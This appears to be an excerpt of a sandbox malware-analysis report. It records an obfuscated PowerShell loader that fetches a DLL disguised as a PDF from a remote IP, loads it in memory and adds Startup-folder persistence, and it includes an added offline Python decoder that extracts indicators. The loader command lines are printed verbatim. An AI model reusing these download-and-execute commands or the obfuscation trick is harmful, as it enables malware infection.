'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
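The command lines above show the obfuscation in full: the $iUqm blob is Base64 of a UTF-16LE string in which every 'U' was swapped for '???', so the blob is not valid Base64 until the stub's .replace('???','U') restores it, which is enough to defeat a scanner that tries to decode Base64 literals it finds on command lines. The recovered script then hands Run() its argument written backwards. The Python below is an added example, not part of the Joe Sandbox report: it reproduces the stub's decode offline (no network access) and extracts the indicators an analyst wants from the result, including un-reversing the Run() argument. The blob and the surrounding command line are transcribed verbatim from the report; the function names and the regular expressions are the author's.

```python
"""Offline decoder for the two-stage PowerShell loader recorded in this report.

Added example; it is not part of the sandbox output. It mirrors the stub on the
wscript.exe -> powershell.exe command line ('???' -> 'U', Base64, UTF-16LE) and
then pulls the IOCs out of the recovered script. No URL is contacted.
"""
import base64
import re

# $iUqm exactly as it appears in the report (transcribed verbatim).
OBFUSCATED = "WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA="

# The rest of the outer -command line from the report, with the blob spliced in.
CMDLINE = (
    "-command $iUqm = '" + OBFUSCATED + "';"
    "$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );"
    "powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD"
)


def decode_stage(blob: str, placeholder: str = "???", letter: str = "U") -> str:
    """Mirror $iUqm.replace(placeholder, letter) -> FromBase64String -> Unicode.GetString."""
    restored = blob.replace(placeholder, letter)
    raw = base64.b64decode(restored, validate=True)  # strict: any leftover '?' raises
    return raw.decode("utf-16-le")


def unwrap_cmdline(cmdline: str) -> str:
    """Take the blob and the .replace() pair from the outer command line itself,
    so the same function works on sibling samples that change the placeholder
    or the variable names."""
    blob = re.search(r"\$\w+\s*=\s*'([A-Za-z0-9+/=?]+)'", cmdline).group(1)
    placeholder, letter = re.search(r"\.replace\('([^']+)','([^']+)'\)", cmdline).groups()
    return decode_stage(blob, placeholder, letter)


def extract_urls(script: str) -> list:
    """Quoted http(s) literals from the script, whether written forwards or reversed."""
    urls = []
    for literal in re.findall(r"'([^']*)'", script):
        for candidate in (literal, literal[::-1]):
            if candidate.startswith(("http://", "https://")):
                urls.append(candidate)
                break
    return urls


def summarize(cmdline: str) -> dict:
    """Decode the inner script and report the indicators an analyst wants from it."""
    script = unwrap_cmdline(cmdline)
    entry = re.search(r"GetType\('([^']+)'\)\.GetMethod\('([^']+)'\)", script)
    return {
        "script": script,
        "urls": extract_urls(script),
        "entrypoint": f"{entry.group(1)}.{entry.group(2)}" if entry else None,
        "in_memory_load": "CurrentDomain.Load(" in script,
    }


if __name__ == "__main__":
    info = summarize(CMDLINE)
    print(info["script"])
    for url in info["urls"]:
        print("IOC url:", url)
    print("entrypoint:", info["entrypoint"], "| assembly loaded from memory:", info["in_memory_load"])
```

Run as-is, the block recovers the second-stage command shown in the report (the [Byte[]] $DLL = ... line), reports the download location http://20.106.232.4/dll/26-05-2022-StartUp.pdf and the entry point ddscfIvqgW.HoNYlDROLP.Run, and un-reverses the Run() argument to http://2.56.57.22/tsdfguhijk.txt, a second indicator that never appears forwards anywhere on the command line. The strict Base64 decode is deliberate: on a sample where the placeholder differs, validate=True fails loudly instead of silently producing garbage.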
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F17C17EE push ss; ret 6_2_00007FF9F17C17EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041D336 push esp; ret 9_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004184C6 push edi; retf 9_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004164EE pushfd ; iretd 9_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDF2 push eax; ret 9_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDFB push eax; ret 9_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDA5 push eax; ret 9_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BE5C push eax; ret 9_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BBD0D1 push ecx; ret 9_2_02BBD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047BD0D1 push ecx; ret 23_2_047BD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321D336 push esp; ret 23_2_0321D338
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BE5C push eax; ret 23_2_0321BE62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDA5 push eax; ret 23_2_0321BDF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDF2 push eax; ret 23_2_0321BDF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDFB push eax; ret 23_2_0321BE62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032164EE pushfd ; iretd 23_2_032164EF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032184C6 push edi; retf 23_2_032184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041D336 push esp; ret 24_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004184C6 push edi; retf 24_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004164EE pushfd ; iretd 24_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDF2 push eax; ret 24_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDFB push eax; ret 24_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDA5 push eax; ret 24_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BE5C push eax; ret 24_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0311D0D1 push ecx; ret 24_2_0311D0E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
